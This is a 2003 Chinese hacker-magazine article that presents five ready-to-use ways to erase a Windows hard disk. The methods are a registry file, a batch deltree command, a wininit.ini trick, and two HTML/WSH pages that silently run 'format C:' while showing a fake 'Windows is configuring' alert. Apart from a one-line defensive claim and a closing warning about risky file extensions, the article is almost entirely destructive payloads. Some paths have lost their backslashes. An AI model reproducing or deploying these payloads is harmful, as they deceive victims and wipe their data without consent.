[原创]解析危险的进攻性文件

注意：谨以此文章献给我的父亲和母亲，感谢他们对我多年来的养育之恩。
本文系中国暗域网络冰血封情原创文章，已经在《黑客X档案》2003年第7期上发表。

原创声明：
中国暗域网络技术资讯站原创文章，作者 冰血封情<EvilOctal>，转载劳烦著名出处。

拙笔正文：
这不是搞破坏，但是只有真正了解这些危险的东西，才能更好的防住这类破坏：）

一、使硬盘文件全部丢失的REG法（不是很好用）：
REGEDIT4

[HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellopencommand]
@-“command/c deltree”<回车>
二、使硬盘文件全部丢失的BAT法：
deltree /y C:*.* deltree –y C:*.* deltree C:*.* /Y deltree C:*.* /autotest
三、使硬盘文件全部丢失的HTML：
以下内容为程序代码:
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"> </object>
<script>
scr.Reset();
scr.Path="C:windowsstart menuPrograms启动automat.hta";
scr.Doc="<object id=&#39;wsh&#39; classid=&#39;clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B&#39;></object>
<script>wsh.Run(&#39;start /m format C: /q /autotest /u&#39;);
alert(&#39;Note:Windows is configing the system,do not interrupt it!&#39;);
</"+"script>";
scr.write();
</script>

四、使硬盘文件全部丢失的Wininit.in法：
[rename]
dirnul=C:
[nul]
c:windowstmpmyfile.tmp=1
[dirnul]
c:tmp=1
[rename]
dirnul=c:test
五、使硬盘文件全部丢失的WSH法：
以下内容为程序代码:
<script>a=new ActiveXObject “Wscript.Shell”
a. run “start/m format.com C: /q/autotest/u”
alert“Note:Windows is configing the system,do not interrupt it!”</script>


△ 最后说明一下：凡是可以以HTML方式执行的文件都可以写入危险命令，甚至调用性的也可以，如：*.hlp（帮助文件）、*.pif（指向文件，用于指向DOS shortcut）、*.lnk（快捷方式），这并不是耸人听闻，而是网络上的不安全性太多了……

更加重要的指出：
在HTML文件中写入代码后，又些文件是用IE预览功能就可以激活文件的，他们的扩展名是：wsc、wsf、vbe、jse……亲爱的朋友们啊，要小心啊！

灌水广告：
——文章原创由 中国暗域网络 及 邪恶八进制 冰血封情<EvilOctal>
——Be powered by Hackway Power of Cn & EvilOctal Security Group EvilOctal
——欢迎访问 www.HackWay.net & www.EvilOctal.com